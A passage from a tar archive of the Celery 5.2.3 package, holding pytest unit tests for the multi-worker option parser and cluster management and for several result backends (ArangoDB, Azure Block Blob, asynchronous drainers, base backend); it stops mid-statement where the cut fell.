xustar000000000000000028 mtime=1640757094.7717562 celery-5.2.3/t/unit/apps/0000775000175000017500000000000000000000000015062 5ustar00asifasif00000000000000././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/t/unit/apps/__init__.py0000664000175000017500000000000000000000000017161 0ustar00asifasif00000000000000././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/t/unit/apps/test_multi.py0000664000175000017500000003757500000000000017646 0ustar00asifasif00000000000000import errno import os import signal import sys from unittest.mock import Mock, call, patch import pytest import t.skip from celery.apps.multi import (Cluster, MultiParser, NamespacedOptionParser, Node, format_opt) class test_functions: def test_parse_ns_range(self): m = MultiParser() assert m._parse_ns_range('1-3', True), ['1', '2' == '3'] assert m._parse_ns_range('1-3', False) == ['1-3'] assert m._parse_ns_range('1-3,10,11,20', True) == [ '1', '2', '3', '10', '11', '20', ] def test_format_opt(self): assert format_opt('--foo', None) == '--foo' assert format_opt('-c', 1) == '-c 1' assert format_opt('--log', 'foo') == '--log=foo' class test_NamespacedOptionParser: def test_parse(self): x = NamespacedOptionParser(['-c:1,3', '4']) x.parse() assert x.namespaces.get('1,3') == {'-c': '4'} x = NamespacedOptionParser(['-c:jerry,elaine', '5', '--loglevel:kramer=DEBUG', '--flag', '--logfile=foo', '-Q', 'bar', 'a', 'b', '--', '.disable_rate_limits=1']) x.parse() assert x.options == { '--logfile': 'foo', '-Q': 'bar', '--flag': None, } assert x.values, ['a' == 'b'] assert x.namespaces.get('jerry,elaine') == {'-c': '5'} assert x.namespaces.get('kramer') == {'--loglevel': 'DEBUG'} assert x.passthrough == '-- .disable_rate_limits=1' def multi_args(p, *args, **kwargs): return MultiParser(*args, **kwargs).parse(p) class test_multi_args: @patch('celery.apps.multi.os.mkdir') @patch('celery.apps.multi.gethostname') def test_parse(self, gethostname, mkdirs_mock): gethostname.return_value = 'example.com' p = NamespacedOptionParser([ '-c:jerry,elaine', '5', '--loglevel:kramer=DEBUG', '--flag', '--logfile=/var/log/celery/foo', '-Q', 'bar', 'jerry', 'elaine', 'kramer', '--', '.disable_rate_limits=1', ]) p.parse() it = multi_args(p, cmd='celery multi', append='*AP*', prefix='*P*', suffix='*S*') nodes = list(it) def assert_line_in(name, args): assert name in {n.name for n in nodes} argv = None for node in nodes: if node.name == name: argv = node.argv assert argv for arg in args: assert arg in argv assert_line_in( '*P*jerry@*S*', ['celery multi', '-n *P*jerry@*S*', '-Q bar', '-c 5', '--flag', '--logfile=/var/log/celery/foo', '-- .disable_rate_limits=1', '*AP*'], ) assert_line_in( '*P*elaine@*S*', ['celery multi', '-n *P*elaine@*S*', '-Q bar', '-c 5', '--flag', '--logfile=/var/log/celery/foo', '-- .disable_rate_limits=1', '*AP*'], ) assert_line_in( '*P*kramer@*S*', ['celery multi', '--loglevel=DEBUG', '-n *P*kramer@*S*', '-Q bar', '--flag', '--logfile=/var/log/celery/foo', '-- .disable_rate_limits=1', '*AP*'], ) expand = nodes[0].expander assert expand('%h') == '*P*jerry@*S*' assert expand('%n') == '*P*jerry' nodes2 = list(multi_args(p, cmd='celery multi', append='', prefix='*P*', suffix='*S*')) assert nodes2[0].argv[-1] == '-- .disable_rate_limits=1' p2 = NamespacedOptionParser(['10', '-c:1', '5']) p2.parse() nodes3 = list(multi_args(p2, cmd='celery multi')) def _args(name, *args): return args + ( '--pidfile={}.pid'.format(os.path.join(os.path.normpath('/var/run/celery/'), name)), '--logfile={}%I.log'.format(os.path.join(os.path.normpath('/var/log/celery/'), name)), f'--executable={sys.executable}', '', ) assert len(nodes3) == 10 assert nodes3[0].name == 'celery1@example.com' assert nodes3[0].argv == ( 'celery multi', '-c 5', '-n celery1@example.com') + _args('celery1') for i, worker in enumerate(nodes3[1:]): assert worker.name == 'celery%s@example.com' % (i + 2) node_i = f'celery{i + 2}' assert worker.argv == ( 'celery multi', f'-n {node_i}@example.com') + _args(node_i) nodes4 = list(multi_args(p2, cmd='celery multi', suffix='""')) assert len(nodes4) == 10 assert nodes4[0].name == 'celery1@' assert nodes4[0].argv == ( 'celery multi', '-c 5', '-n celery1@') + _args('celery1') p3 = NamespacedOptionParser(['foo@', '-c:foo', '5']) p3.parse() nodes5 = list(multi_args(p3, cmd='celery multi', suffix='""')) assert nodes5[0].name == 'foo@' assert nodes5[0].argv == ( 'celery multi', '-c 5', '-n foo@') + _args('foo') p4 = NamespacedOptionParser(['foo', '-Q:1', 'test']) p4.parse() nodes6 = list(multi_args(p4, cmd='celery multi', suffix='""')) assert nodes6[0].name == 'foo@' assert nodes6[0].argv == ( 'celery multi', '-Q test', '-n foo@') + _args('foo') p5 = NamespacedOptionParser(['foo@bar', '-Q:1', 'test']) p5.parse() nodes7 = list(multi_args(p5, cmd='celery multi', suffix='""')) assert nodes7[0].name == 'foo@bar' assert nodes7[0].argv == ( 'celery multi', '-Q test', '-n foo@bar') + _args('foo') p6 = NamespacedOptionParser(['foo@bar', '-Q:0', 'test']) p6.parse() with pytest.raises(KeyError): list(multi_args(p6)) def test_optmerge(self): p = NamespacedOptionParser(['foo', 'test']) p.parse() p.options = {'x': 'y'} r = p.optmerge('foo') assert r['x'] == 'y' class test_Node: def setup(self): self.p = Mock(name='p') self.p.options = { '--executable': 'python', '--logfile': '/var/log/celery/foo.log', } self.p.namespaces = {} with patch('celery.apps.multi.os.mkdir'): self.node = Node('foo@bar.com', options={'-A': 'proj'}) self.expander = self.node.expander = Mock(name='expander') self.node.pid = 303 def test_from_kwargs(self): with patch('celery.apps.multi.os.mkdir'): n = Node.from_kwargs( 'foo@bar.com', max_tasks_per_child=30, A='foo', Q='q1,q2', O='fair', ) assert sorted(n.argv) == sorted([ '-m celery -A foo worker --detach', f'--executable={n.executable}', '-O fair', '-n foo@bar.com', '--logfile={}'.format(os.path.normpath('/var/log/celery/foo%I.log')), '-Q q1,q2', '--max-tasks-per-child=30', '--pidfile={}'.format(os.path.normpath('/var/run/celery/foo.pid')), '', ]) @patch('os.kill') def test_send(self, kill): assert self.node.send(9) kill.assert_called_with(self.node.pid, 9) @patch('os.kill') def test_send__ESRCH(self, kill): kill.side_effect = OSError() kill.side_effect.errno = errno.ESRCH assert not self.node.send(9) kill.assert_called_with(self.node.pid, 9) @patch('os.kill') def test_send__error(self, kill): kill.side_effect = OSError() kill.side_effect.errno = errno.ENOENT with pytest.raises(OSError): self.node.send(9) kill.assert_called_with(self.node.pid, 9) def test_alive(self): self.node.send = Mock(name='send') assert self.node.alive() is self.node.send.return_value self.node.send.assert_called_with(0) def test_start(self): self.node._waitexec = Mock(name='_waitexec') self.node.start(env={'foo': 'bar'}, kw=2) self.node._waitexec.assert_called_with( self.node.argv, path=self.node.executable, env={'foo': 'bar'}, kw=2, ) @patch('celery.apps.multi.Popen') def test_waitexec(self, Popen, argv=['A', 'B']): on_spawn = Mock(name='on_spawn') on_signalled = Mock(name='on_signalled') on_failure = Mock(name='on_failure') env = Mock(name='env') self.node.handle_process_exit = Mock(name='handle_process_exit') self.node._waitexec( argv, path='python', env=env, on_spawn=on_spawn, on_signalled=on_signalled, on_failure=on_failure, ) Popen.assert_called_with( self.node.prepare_argv(argv, 'python'), env=env) self.node.handle_process_exit.assert_called_with( Popen().wait(), on_signalled=on_signalled, on_failure=on_failure, ) def test_handle_process_exit(self): assert self.node.handle_process_exit(0) == 0 def test_handle_process_exit__failure(self): on_failure = Mock(name='on_failure') assert self.node.handle_process_exit(9, on_failure=on_failure) == 9 on_failure.assert_called_with(self.node, 9) def test_handle_process_exit__signalled(self): on_signalled = Mock(name='on_signalled') assert self.node.handle_process_exit( -9, on_signalled=on_signalled) == 9 on_signalled.assert_called_with(self.node, 9) def test_logfile(self): assert self.node.logfile == self.expander.return_value self.expander.assert_called_with(os.path.normpath('/var/log/celery/%n%I.log')) @patch('celery.apps.multi.os.path.exists') def test_pidfile_default(self, mock_exists): n = Node.from_kwargs( 'foo@bar.com', ) assert n.options['--pidfile'] == os.path.normpath('/var/run/celery/%n.pid') mock_exists.assert_any_call(os.path.normpath('/var/run/celery')) @patch('celery.apps.multi.os.makedirs') @patch('celery.apps.multi.os.path.exists', return_value=False) def test_pidfile_custom(self, mock_exists, mock_dirs): n = Node.from_kwargs( 'foo@bar.com', pidfile='/var/run/demo/celery/%n.pid' ) assert n.options['--pidfile'] == '/var/run/demo/celery/%n.pid' try: mock_exists.assert_any_call('/var/run/celery') except AssertionError: pass else: raise AssertionError("Expected exists('/var/run/celery') to not have been called.") mock_exists.assert_any_call('/var/run/demo/celery') mock_dirs.assert_any_call('/var/run/demo/celery') class test_Cluster: def setup(self): self.Popen = self.patching('celery.apps.multi.Popen') self.kill = self.patching('os.kill') self.gethostname = self.patching('celery.apps.multi.gethostname') self.gethostname.return_value = 'example.com' self.Pidfile = self.patching('celery.apps.multi.Pidfile') with patch('celery.apps.multi.os.mkdir'): self.cluster = Cluster( [Node('foo@example.com'), Node('bar@example.com'), Node('baz@example.com')], on_stopping_preamble=Mock(name='on_stopping_preamble'), on_send_signal=Mock(name='on_send_signal'), on_still_waiting_for=Mock(name='on_still_waiting_for'), on_still_waiting_progress=Mock(name='on_still_waiting_progress'), on_still_waiting_end=Mock(name='on_still_waiting_end'), on_node_start=Mock(name='on_node_start'), on_node_restart=Mock(name='on_node_restart'), on_node_shutdown_ok=Mock(name='on_node_shutdown_ok'), on_node_status=Mock(name='on_node_status'), on_node_signal=Mock(name='on_node_signal'), on_node_signal_dead=Mock(name='on_node_signal_dead'), on_node_down=Mock(name='on_node_down'), on_child_spawn=Mock(name='on_child_spawn'), on_child_signalled=Mock(name='on_child_signalled'), on_child_failure=Mock(name='on_child_failure'), ) def test_len(self): assert len(self.cluster) == 3 def test_getitem(self): assert self.cluster[0].name == 'foo@example.com' def test_start(self): self.cluster.start_node = Mock(name='start_node') self.cluster.start() self.cluster.start_node.assert_has_calls( call(node) for node in self.cluster ) def test_start_node(self): self.cluster._start_node = Mock(name='_start_node') node = self.cluster[0] assert (self.cluster.start_node(node) is self.cluster._start_node.return_value) self.cluster.on_node_start.assert_called_with(node) self.cluster._start_node.assert_called_with(node) self.cluster.on_node_status.assert_called_with( node, self.cluster._start_node(), ) def test__start_node(self): node = self.cluster[0] node.start = Mock(name='node.start') assert self.cluster._start_node(node) is node.start.return_value node.start.assert_called_with( self.cluster.env, on_spawn=self.cluster.on_child_spawn, on_signalled=self.cluster.on_child_signalled, on_failure=self.cluster.on_child_failure, ) def test_send_all(self): nodes = [Mock(name='n1'), Mock(name='n2')] self.cluster.getpids = Mock(name='getpids') self.cluster.getpids.return_value = nodes self.cluster.send_all(15) self.cluster.on_node_signal.assert_has_calls( call(node, 'TERM') for node in nodes ) for node in nodes: node.send.assert_called_with(15, self.cluster.on_node_signal_dead) @t.skip.if_win32 def test_kill(self): self.cluster.send_all = Mock(name='.send_all') self.cluster.kill() self.cluster.send_all.assert_called_with(signal.SIGKILL) def test_getpids(self): self.gethostname.return_value = 'e.com' self.prepare_pidfile_for_getpids(self.Pidfile) callback = Mock() with patch('celery.apps.multi.os.mkdir'): p = Cluster([ Node('foo@e.com'), Node('bar@e.com'), Node('baz@e.com'), ]) nodes = p.getpids(on_down=callback) node_0, node_1 = nodes assert node_0.name == 'foo@e.com' assert sorted(node_0.argv) == sorted([ '', f'--executable={node_0.executable}', '--logfile={}'.format(os.path.normpath('/var/log/celery/foo%I.log')), '--pidfile={}'.format(os.path.normpath('/var/run/celery/foo.pid')), '-m celery worker --detach', '-n foo@e.com', ]) assert node_0.pid == 10 assert node_1.name == 'bar@e.com' assert sorted(node_1.argv) == sorted([ '', f'--executable={node_1.executable}', '--logfile={}'.format(os.path.normpath('/var/log/celery/bar%I.log')), '--pidfile={}'.format(os.path.normpath('/var/run/celery/bar.pid')), '-m celery worker --detach', '-n bar@e.com', ]) assert node_1.pid == 11 # without callback, should work nodes = p.getpids('celery worker') def prepare_pidfile_for_getpids(self, Pidfile): class pids: def __init__(self, path): self.path = path def read_pid(self): try: return {os.path.normpath('/var/run/celery/foo.pid'): 10, os.path.normpath('/var/run/celery/bar.pid'): 11}[self.path] except KeyError: raise ValueError() self.Pidfile.side_effect = pids ././@PaxHeader0000000000000000000000000000003400000000000011452 xustar000000000000000028 mtime=1640757094.7957566 celery-5.2.3/t/unit/backends/0000775000175000017500000000000000000000000015671 5ustar00asifasif00000000000000././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/t/unit/backends/__init__.py0000664000175000017500000000000000000000000017770 0ustar00asifasif00000000000000././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/t/unit/backends/test_arangodb.py0000664000175000017500000001040300000000000021055 0ustar00asifasif00000000000000"""Tests for the ArangoDb.""" import datetime from unittest.mock import Mock, patch, sentinel import pytest from celery.app import backends from celery.backends import arangodb as module from celery.backends.arangodb import ArangoDbBackend from celery.exceptions import ImproperlyConfigured try: import pyArango except ImportError: pyArango = None pytest.importorskip('pyArango') class test_ArangoDbBackend: def setup(self): self.backend = ArangoDbBackend(app=self.app) def test_init_no_arangodb(self): prev, module.py_arango_connection = module.py_arango_connection, None try: with pytest.raises(ImproperlyConfigured): ArangoDbBackend(app=self.app) finally: module.py_arango_connection = prev def test_init_no_settings(self): self.app.conf.arangodb_backend_settings = [] with pytest.raises(ImproperlyConfigured): ArangoDbBackend(app=self.app) def test_init_settings_is_None(self): self.app.conf.arangodb_backend_settings = None ArangoDbBackend(app=self.app) def test_get_connection_connection_exists(self): with patch('pyArango.connection.Connection') as mock_Connection: self.backend._connection = sentinel._connection connection = self.backend._connection assert sentinel._connection == connection mock_Connection.assert_not_called() def test_get(self): self.app.conf.arangodb_backend_settings = {} x = ArangoDbBackend(app=self.app) x.get = Mock() x.get.return_value = sentinel.retval assert x.get('1f3fab') == sentinel.retval x.get.assert_called_once_with('1f3fab') def test_delete(self): self.app.conf.arangodb_backend_settings = {} x = ArangoDbBackend(app=self.app) x.delete = Mock() x.delete.return_value = None assert x.delete('1f3fab') is None def test_config_params(self): self.app.conf.arangodb_backend_settings = { 'host': 'test.arangodb.com', 'port': '8529', 'username': 'johndoe', 'password': 'mysecret', 'database': 'celery_database', 'collection': 'celery_collection', 'http_protocol': 'https', 'verify': True } x = ArangoDbBackend(app=self.app) assert x.host == 'test.arangodb.com' assert x.port == 8529 assert x.username == 'johndoe' assert x.password == 'mysecret' assert x.database == 'celery_database' assert x.collection == 'celery_collection' assert x.http_protocol == 'https' assert x.arangodb_url == 'https://test.arangodb.com:8529' assert x.verify is True def test_backend_by_url( self, url="arangodb://username:password@host:port/database/collection" ): from celery.backends.arangodb import ArangoDbBackend backend, url_ = backends.by_url(url, self.app.loader) assert backend is ArangoDbBackend assert url_ == url def test_backend_params_by_url(self): url = ( "arangodb://johndoe:mysecret@test.arangodb.com:8529/" "celery_database/celery_collection" ) with self.Celery(backend=url) as app: x = app.backend assert x.host == 'test.arangodb.com' assert x.port == 8529 assert x.username == 'johndoe' assert x.password == 'mysecret' assert x.database == 'celery_database' assert x.collection == 'celery_collection' assert x.http_protocol == 'http' assert x.arangodb_url == 'http://test.arangodb.com:8529' assert x.verify is False def test_backend_cleanup(self): now = datetime.datetime.utcnow() self.backend.app.now = Mock(return_value=now) self.backend._connection = { 'celery': Mock(), } self.backend.cleanup() expected_date = (now - self.backend.expires_delta).isoformat() expected_query = ( 'FOR item IN celery ' 'FILTER item.task.date_done < "{date}" ' 'REMOVE item IN celery' ).format(date=expected_date) self.backend.db.AQLQuery.assert_called_once_with(expected_query) ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1637501858.0 celery-5.2.3/t/unit/backends/test_asynchronous.py0000664000175000017500000001533200000000000022041 0ustar00asifasif00000000000000import os import socket import sys import threading import time from unittest.mock import Mock, patch import pytest from vine import promise from celery.backends.asynchronous import BaseResultConsumer from celery.backends.base import Backend from celery.utils import cached_property pytest.importorskip('gevent') pytest.importorskip('eventlet') @pytest.fixture(autouse=True) def setup_eventlet(): # By default eventlet will patch the DNS resolver when imported. os.environ.update(EVENTLET_NO_GREENDNS='yes') class DrainerTests: """ Base test class for the Default / Gevent / Eventlet drainers. """ interval = 0.1 # Check every tenth of a second MAX_TIMEOUT = 10 # Specify a max timeout so it doesn't run forever def get_drainer(self, environment): with patch('celery.backends.asynchronous.detect_environment') as d: d.return_value = environment backend = Backend(self.app) consumer = BaseResultConsumer(backend, self.app, backend.accept, pending_results={}, pending_messages={}) consumer.drain_events = Mock(side_effect=self.result_consumer_drain_events) return consumer.drainer @pytest.fixture(autouse=True) def setup_drainer(self): raise NotImplementedError @cached_property def sleep(self): """ Sleep on the event loop. """ raise NotImplementedError def schedule_thread(self, thread): """ Set up a thread that runs on the event loop. """ raise NotImplementedError def teardown_thread(self, thread): """ Wait for a thread to stop. """ raise NotImplementedError def result_consumer_drain_events(self, timeout=None): """ Subclasses should override this method to define the behavior of drainer.result_consumer.drain_events. """ raise NotImplementedError def test_drain_checks_on_interval(self): p = promise() def fulfill_promise_thread(): self.sleep(self.interval * 2) p('done') fulfill_thread = self.schedule_thread(fulfill_promise_thread) on_interval = Mock() for _ in self.drainer.drain_events_until(p, on_interval=on_interval, interval=self.interval, timeout=self.MAX_TIMEOUT): pass self.teardown_thread(fulfill_thread) assert p.ready, 'Should have terminated with promise being ready' assert on_interval.call_count < 20, 'Should have limited number of calls to on_interval' def test_drain_does_not_block_event_loop(self): """ This test makes sure that other greenlets can still operate while drain_events_until is running. """ p = promise() liveness_mock = Mock() def fulfill_promise_thread(): self.sleep(self.interval * 2) p('done') def liveness_thread(): while 1: if p.ready: return self.sleep(self.interval / 10) liveness_mock() fulfill_thread = self.schedule_thread(fulfill_promise_thread) liveness_thread = self.schedule_thread(liveness_thread) on_interval = Mock() for _ in self.drainer.drain_events_until(p, on_interval=on_interval, interval=self.interval, timeout=self.MAX_TIMEOUT): pass self.teardown_thread(fulfill_thread) self.teardown_thread(liveness_thread) assert p.ready, 'Should have terminated with promise being ready' assert on_interval.call_count <= liveness_mock.call_count, \ 'Should have served liveness_mock while waiting for event' def test_drain_timeout(self): p = promise() on_interval = Mock() with pytest.raises(socket.timeout): for _ in self.drainer.drain_events_until(p, on_interval=on_interval, interval=self.interval, timeout=self.interval * 5): pass assert not p.ready, 'Promise should remain un-fulfilled' assert on_interval.call_count < 20, 'Should have limited number of calls to on_interval' @pytest.mark.skipif( sys.platform == "win32", reason="hangs forever intermittently on windows" ) class test_EventletDrainer(DrainerTests): @pytest.fixture(autouse=True) def setup_drainer(self): self.drainer = self.get_drainer('eventlet') @cached_property def sleep(self): from eventlet import sleep return sleep def result_consumer_drain_events(self, timeout=None): import eventlet # `drain_events` of asynchronous backends with pubsub have to sleep # while waiting events for not more then `interval` timeout, # but events may coming sooner eventlet.sleep(timeout/10) def schedule_thread(self, thread): import eventlet g = eventlet.spawn(thread) eventlet.sleep(0) return g def teardown_thread(self, thread): thread.wait() class test_Drainer(DrainerTests): @pytest.fixture(autouse=True) def setup_drainer(self): self.drainer = self.get_drainer('default') @cached_property def sleep(self): from time import sleep return sleep def result_consumer_drain_events(self, timeout=None): time.sleep(timeout) def schedule_thread(self, thread): t = threading.Thread(target=thread) t.start() return t def teardown_thread(self, thread): thread.join() class test_GeventDrainer(DrainerTests): @pytest.fixture(autouse=True) def setup_drainer(self): self.drainer = self.get_drainer('gevent') @cached_property def sleep(self): from gevent import sleep return sleep def result_consumer_drain_events(self, timeout=None): import gevent # `drain_events` of asynchronous backends with pubsub have to sleep # while waiting events for not more then `interval` timeout, # but events may coming sooner gevent.sleep(timeout/10) def schedule_thread(self, thread): import gevent g = gevent.spawn(thread) gevent.sleep(0) return g def teardown_thread(self, thread): import gevent gevent.wait([thread]) ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/t/unit/backends/test_azureblockblob.py0000664000175000017500000001517400000000000022312 0ustar00asifasif00000000000000from unittest.mock import Mock, call, patch import pytest from celery import states from celery.backends import azureblockblob from celery.backends.azureblockblob import AzureBlockBlobBackend from celery.exceptions import ImproperlyConfigured MODULE_TO_MOCK = "celery.backends.azureblockblob" pytest.importorskip('azure.storage.blob') pytest.importorskip('azure.core.exceptions') class test_AzureBlockBlobBackend: def setup(self): self.url = ( "azureblockblob://" "DefaultEndpointsProtocol=protocol;" "AccountName=name;" "AccountKey=key;" "EndpointSuffix=suffix") self.backend = AzureBlockBlobBackend( app=self.app, url=self.url) @pytest.fixture(params=['', 'my_folder/']) def base_path(self, request): return request.param def test_missing_third_party_sdk(self): azurestorage = azureblockblob.azurestorage try: azureblockblob.azurestorage = None with pytest.raises(ImproperlyConfigured): AzureBlockBlobBackend(app=self.app, url=self.url) finally: azureblockblob.azurestorage = azurestorage def test_bad_connection_url(self): with pytest.raises(ImproperlyConfigured): AzureBlockBlobBackend._parse_url("azureblockblob://") with pytest.raises(ImproperlyConfigured): AzureBlockBlobBackend._parse_url("") @patch(MODULE_TO_MOCK + ".BlobServiceClient") def test_create_client(self, mock_blob_service_factory): mock_blob_service_client_instance = Mock() mock_blob_service_factory.from_connection_string.return_value = mock_blob_service_client_instance backend = AzureBlockBlobBackend(app=self.app, url=self.url) # ensure container gets created on client access... assert mock_blob_service_client_instance.create_container.call_count == 0 assert backend._blob_service_client is not None assert mock_blob_service_client_instance.create_container.call_count == 1 # ...but only once per backend instance assert backend._blob_service_client is not None assert mock_blob_service_client_instance.create_container.call_count == 1 @patch(MODULE_TO_MOCK + ".BlobServiceClient") def test_configure_client(self, mock_blob_service_factory): connection_timeout = 3 read_timeout = 11 self.app.conf.update( { 'azureblockblob_connection_timeout': connection_timeout, 'azureblockblob_read_timeout': read_timeout, } ) mock_blob_service_client_instance = Mock() mock_blob_service_factory.from_connection_string.return_value = ( mock_blob_service_client_instance ) base_url = "azureblockblob://" connection_string = "connection_string" backend = AzureBlockBlobBackend( app=self.app, url=f'{base_url}{connection_string}' ) client = backend._blob_service_client assert client is mock_blob_service_client_instance ( mock_blob_service_factory .from_connection_string .assert_called_once_with( connection_string, connection_timeout=connection_timeout, read_timeout=read_timeout ) ) @patch(MODULE_TO_MOCK + ".AzureBlockBlobBackend._blob_service_client") def test_get(self, mock_client, base_path): self.backend.base_path = base_path self.backend.get(b"mykey") mock_client.get_blob_client \ .assert_called_once_with(blob=base_path + "mykey", container="celery") mock_client.get_blob_client.return_value \ .download_blob.return_value \ .readall.return_value \ .decode.assert_called_once() @patch(MODULE_TO_MOCK + ".AzureBlockBlobBackend._blob_service_client") def test_get_missing(self, mock_client): mock_client.get_blob_client.return_value \ .download_blob.return_value \ .readall.side_effect = azureblockblob.ResourceNotFoundError assert self.backend.get(b"mykey") is None @patch(MODULE_TO_MOCK + ".AzureBlockBlobBackend._blob_service_client") def test_set(self, mock_client, base_path): self.backend.base_path = base_path self.backend._set_with_state(b"mykey", "myvalue", states.SUCCESS) mock_client.get_blob_client.assert_called_once_with( container="celery", blob=base_path + "mykey") mock_client.get_blob_client.return_value \ .upload_blob.assert_called_once_with("myvalue", overwrite=True) @patch(MODULE_TO_MOCK + ".AzureBlockBlobBackend._blob_service_client") def test_mget(self, mock_client, base_path): keys = [b"mykey1", b"mykey2"] self.backend.base_path = base_path self.backend.mget(keys) mock_client.get_blob_client.assert_has_calls( [call(blob=base_path + key.decode(), container='celery') for key in keys], any_order=True,) @patch(MODULE_TO_MOCK + ".AzureBlockBlobBackend._blob_service_client") def test_delete(self, mock_client, base_path): self.backend.base_path = base_path self.backend.delete(b"mykey") mock_client.get_blob_client.assert_called_once_with( container="celery", blob=base_path + "mykey") mock_client.get_blob_client.return_value \ .delete_blob.assert_called_once() def test_base_path_conf(self, base_path): self.app.conf.azureblockblob_base_path = base_path backend = AzureBlockBlobBackend( app=self.app, url=self.url ) assert backend.base_path == base_path def test_base_path_conf_default(self): backend = AzureBlockBlobBackend( app=self.app, url=self.url ) assert backend.base_path == '' class test_as_uri: def setup(self): self.url = ( "azureblockblob://" "DefaultEndpointsProtocol=protocol;" "AccountName=name;" "AccountKey=account_key;" "EndpointSuffix=suffix" ) self.backend = AzureBlockBlobBackend( app=self.app, url=self.url ) def test_as_uri_include_password(self): assert self.backend.as_uri(include_password=True) == self.url def test_as_uri_exclude_password(self): assert self.backend.as_uri(include_password=False) == ( "azureblockblob://" "DefaultEndpointsProtocol=protocol;" "AccountName=name;" "AccountKey=**;" "EndpointSuffix=suffix" ) ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1640755259.0 celery-5.2.3/t/unit/backends/test_base.py0000664000175000017500000012516300000000000020224 0ustar00asifasif00000000000000import re from contextlib import contextmanager from unittest.mock import ANY, MagicMock, Mock, call, patch, sentinel import pytest from kombu.serialization import prepare_accept_content from kombu.utils.encoding import ensure_bytes import celery from celery import chord, group, signature, states, uuid from celery.app.task import Context, Task from celery.backends.base import (BaseBackend, DisabledBackend, KeyValueStoreBackend, _nulldict) from celery.exceptions import (BackendGetMetaError, BackendStoreError, ChordError, SecurityError, TimeoutError) from celery.result import result_from_tuple from celery.utils import serialization from celery.utils.functional import pass1 from celery.utils.serialization import UnpickleableExceptionWrapper from celery.utils.serialization import find_pickleable_exception as fnpe from celery.utils.serialization import get_pickleable_exception as gpe from celery.utils.serialization import subclass_exception class wrapobject: def __init__(self, *args, **kwargs): self.args = args class paramexception(Exception): def __init__(self, param): self.param = param class objectexception: class Nested(Exception): pass Oldstyle = None Unpickleable = subclass_exception( 'Unpickleable', KeyError, 'foo.module', ) Impossible = subclass_exception( 'Impossible', object, 'foo.module', ) Lookalike = subclass_exception( 'Lookalike', wrapobject, 'foo.module', ) class test_nulldict: def test_nulldict(self): x = _nulldict() x['foo'] = 1 x.update(foo=1, bar=2) x.setdefault('foo', 3) class test_serialization: def test_create_exception_cls(self): assert serialization.create_exception_cls('FooError', 'm') assert serialization.create_exception_cls('FooError', 'm', KeyError) class test_Backend_interface: def setup(self): self.app.conf.accept_content = ['json'] def test_accept_precedence(self): # default is app.conf.accept_content accept_content = self.app.conf.accept_content b1 = BaseBackend(self.app) assert prepare_accept_content(accept_content) == b1.accept # accept parameter b2 = BaseBackend(self.app, accept=['yaml']) assert len(b2.accept) == 1 assert list(b2.accept)[0] == 'application/x-yaml' assert prepare_accept_content(['yaml']) == b2.accept # accept parameter over result_accept_content self.app.conf.result_accept_content = ['json'] b3 = BaseBackend(self.app, accept=['yaml']) assert len(b3.accept) == 1 assert list(b3.accept)[0] == 'application/x-yaml' assert prepare_accept_content(['yaml']) == b3.accept # conf.result_accept_content if specified self.app.conf.result_accept_content = ['yaml'] b4 = BaseBackend(self.app) assert len(b4.accept) == 1 assert list(b4.accept)[0] == 'application/x-yaml' assert prepare_accept_content(['yaml']) == b4.accept def test_get_result_meta(self): b1 = BaseBackend(self.app) meta = b1._get_result_meta(result={'fizz': 'buzz'}, state=states.SUCCESS, traceback=None, request=None) assert meta['status'] == states.SUCCESS assert meta['result'] == {'fizz': 'buzz'} assert meta['traceback'] is None self.app.conf.result_extended = True args = ['a', 'b'] kwargs = {'foo': 'bar'} task_name = 'mytask' b2 = BaseBackend(self.app) request = Context(args=args, kwargs=kwargs, task=task_name, delivery_info={'routing_key': 'celery'}) meta = b2._get_result_meta(result={'fizz': 'buzz'}, state=states.SUCCESS, traceback=None, request=request, encode=False) assert meta['name'] == task_name assert meta['args'] == args assert meta['kwargs'] == kwargs assert meta['queue'] == 'celery' def test_get_result_meta_encoded(self): self.app.conf.result_extended = True b1 = BaseBackend(self.app) args = ['a', 'b'] kwargs = {'foo': 'bar'} request = Context(args=args, kwargs=kwargs) meta = b1._get_result_meta(result={'fizz': 'buzz'}, state=states.SUCCESS, traceback=None, request=request, encode=True) assert meta['args'] == ensure_bytes(b1.encode(args)) assert meta['kwargs'] == ensure_bytes(b1.encode(kwargs)) def test_get_result_meta_with_none(self): b1 = BaseBackend(self.app) meta = b1._get_result_meta(result=None, state=states.SUCCESS, traceback=None, request=None) assert meta['status'] == states.SUCCESS assert meta['result'] is None assert meta['traceback'] is None self.app.conf.result_extended = True args = ['a', 'b'] kwargs = {'foo': 'bar'} task_name = 'mytask' b2 = BaseBackend(self.app) request = Context(args=args, kwargs=kwargs, task=task_name, delivery_info={'routing_key': 'celery'}) meta = b2._get_result_meta(result=None, state=states.SUCCESS, traceback=None, request=request, encode=False) assert meta['name'] == task_name assert meta['args'] == args assert meta['kwargs'] == kwargs assert meta['queue'] == 'celery' class test_BaseBackend_interface: def setup(self): self.b = BaseBackend(self.app) @self.app.task(shared=False) def callback(result): pass self.callback = callback def test__forget(self): with pytest.raises(NotImplementedError): self.b._forget('SOMExx-N0Nex1stant-IDxx-') def test_forget(self): with pytest.raises(NotImplementedError): self.b.forget('SOMExx-N0nex1stant-IDxx-') def test_on_chord_part_return(self): self.b.on_chord_part_return(None, None, None) def test_apply_chord(self, unlock='celery.chord_unlock'): self.app.tasks[unlock] = Mock() header_result_args = ( uuid(), [self.app.AsyncResult(x) for x in range(3)], ) self.b.apply_chord(header_result_args, self.callback.s()) assert self.app.tasks[unlock].apply_async.call_count def test_chord_unlock_queue(self, unlock='celery.chord_unlock'): self.app.tasks[unlock] = Mock() header_result_args = ( uuid(), [self.app.AsyncResult(x) for x in range(3)], ) body = self.callback.s() self.b.apply_chord(header_result_args, body) called_kwargs = self.app.tasks[unlock].apply_async.call_args[1] assert called_kwargs['queue'] == 'testcelery' routing_queue = Mock() routing_queue.name = "routing_queue" self.app.amqp.router.route = Mock(return_value={ "queue": routing_queue }) self.b.apply_chord(header_result_args, body) assert 